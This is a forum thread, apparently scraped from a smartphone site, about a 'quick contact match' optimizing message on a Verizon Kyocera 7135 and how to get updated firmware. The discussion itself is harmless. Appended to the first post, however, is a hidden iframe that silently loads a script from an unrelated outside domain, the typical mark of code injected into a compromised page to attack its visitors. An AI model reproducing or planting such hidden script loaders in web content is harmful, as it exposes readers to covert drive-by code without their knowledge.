+ Reply to Thread

Thread: Strange Message

Strange Message

I had an Alltel 7135, but it was damaged and I Just got a new Verizon 7135. I've done a few hotsyncs and after each hotsync I get a message on the phone that says "Optimizing quick contact march database. Please wait." I never got that error message with the Alltel 7135. Is this normal with the Verizon 7135's?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think this is normal b/c I just noticed that under Phone Preferences/Display "Quick Contact Match" is an option that is not on my ALltel 7135.

It is an enhancement. You have newer software. It allows the phone to find names for numbers faster.

Giddyup, Giddyup, Giddyup 7135 TheBeachBoy's Avatar
    I'll probably be getting an Alltel 7135, so how would I get the updated software? I hope it hasn't been discussed before.
    TheBeachBoy

--The World's Greatest Drummer--
    Drummer for the Fondells

Originally posted by HoTSynC
    It is an enhancement. You have newer software. It allows the phone to find names for numbers faster.
    I like that! Sounds like Kyo got on the ball and added a caching or indexing feature.

Originally posted by TheBeachBoy
    I'll probably be getting an Alltel 7135, so how would I get the updated software? I hope it hasn't been discussed before.
    Here is one of the over 100 messages I've read answering this question . Maybe there should be a FAQ with this specific header since everytime there is new firmware, someone will probably ask again.

http://www.smartphonesource.com/vbul...&threadid=6617